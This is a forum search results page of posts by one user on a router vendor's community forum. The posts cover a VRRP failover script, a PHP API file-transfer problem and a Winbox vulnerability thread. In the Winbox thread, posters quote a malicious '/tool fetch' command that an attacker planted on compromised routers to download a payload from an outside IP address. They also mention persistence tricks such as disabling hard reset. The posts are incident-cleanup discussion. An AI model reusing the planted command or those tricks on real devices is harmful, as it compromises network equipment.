Community discussions

Search found 12 matches

by excession
Wed Aug 08, 2018 3:19 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 108
Views: 11053

Re: Winbox vulnerability: please upgrade

Is he trying to use Winbox to connect No idea, but possible. how would you route a Winbox connection through a socks proxy? I assume that's a rhetorical question. Haha, actually no, just one based on an almost complete ignorance of socks! I did just find some interesting discussion here: https://fo...
by excession
Wed Aug 08, 2018 2:45 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 108
Views: 11053

Re: Winbox vulnerability: please upgrade

2. I have try to login to remote mikrotik with that password but no success so I think the problem come from the hacker allow only IP 127.0.0.1 to login with "sys" account. And the hacker use script to disable hard reset, so I just ask can I use the serial cable to login. (infected router is still ...
by excession
Wed Aug 08, 2018 2:41 am
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 108
Views: 11053

Re: Winbox vulnerability: please upgrade

Thats it! THX! In scripts are /tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now. Thanks I grabbed the PHP file before fixing my router. I opened it with notepad a...
by excession
Sun Aug 05, 2018 3:04 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 108
Views: 11053

Re: Winbox vulnerability: please upgrade

Thats it! THX!

In scripts are
/tool fetch address=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http
Does anyone have the contents of the payload they can post? I've tried hitting the above but it's 404ing now.

Thanks
by excession
Fri Aug 03, 2018 5:54 pm
Forum: Announcements
Topic: Winbox vulnerability: please upgrade
Replies: 108
Views: 11053

Re: Winbox vulnerability: please upgrade

Since the attacker is inserting his script into the targeted routers and changing configuration in them, we recommend to carefully inspect the configuration of your device, restore it from verified backups or export files, and follow generic advice in the above links. What sorts of changes are bein...
by excession
Fri Jul 06, 2018 12:19 pm
Forum: Scripting
Topic: VRRP Priority Script For Device Failover
Replies: 1
Views: 237

Re: VRRP Priority Script For Device Failover

The above script worked fine for some time until we started to add VRRP interfaces on top of VLAN interfaces, these seem to take a little longer to negotiate state and in turn cause the master to bounce back and fourth between devices. Below are the script updates I've made to resolve the issue: #:l...
by excession
Mon Apr 16, 2018 12:03 pm
Forum: Scripting
Topic: VRRP Priority Script For Device Failover
Replies: 1
Views: 237

VRRP Priority Script For Device Failover

Hi folks, I had some trouble finding script examples when I wanted to sync my VRRP interfaces. Thought I'd post my examples for what worked for me in the end, to hopefully signpost others. In my scenario: I wanted to ensure that all the VRRP interfaces across my two gateway devices had consistent st...
by excession
Sat May 16, 2015 3:39 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 887

Re: PHP API fileGetContents problem

When I say "Manually" I mean; from Terminal on the device. Where I get a blank response if I run /system health print. The boxes that fail are both mipsbe: routerboard: yes model: 2011iL current-firmware: 3.18 routerboard: yes model: 751U-2HnD current-firmware: 2.37 You're right of course, we should...
by excession
Sat May 16, 2015 12:40 am
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 887

Re: PHP API fileGetContents problem

Ahh that's brilliant thank you very much. Actually it makes me think of another issue I'm having. I have one (so far as I've found) box that crashes my script if I try to get health data from it. It's v6.20 but I have another v6.20 box that works just fine. I've tried manually running this process o...
by excession
Fri May 15, 2015 4:48 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 887

Re: PHP API fileGetContents problem

Hey, thanks for replying. I'm using php ver 5.4.24 and the export files I'm trying to transfer are all around 2k - 12k. I'm talking to various RouterOS versions but my test system is on ver 6.24. We ended up pushing rather than pulling just to have one less port open on these devices. Unfortunately ...
by excession
Thu May 14, 2015 10:19 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 887

Re: PHP API fileGetContents problem

Couldn't get it to work. In the end I scripted pushing the export file to an FTP server from the target device. //ftp transfer export file $addRequest = new RouterOS\Request('/tool fetch'); $addRequest->setArgument('address', '***.***.***.***'); $addRequest->setArgument('src-path', 'auto_export.rsc'...
by excession
Mon May 11, 2015 8:25 pm
Forum: Scripting
Topic: PHP API fileGetContents problem
Replies: 7
Views: 887

PHP API fileGetContents problem

Hi Folks, I'm having trouble reading files via the PHP API. My script will happily make a backup file but I'm then unable to get that file back to the webserver: $util = new RouterOS\Util( $client = new RouterOS\Client('******', '******', '******') ); $filename = 'backup.rsc'; $addRequest = new Rout...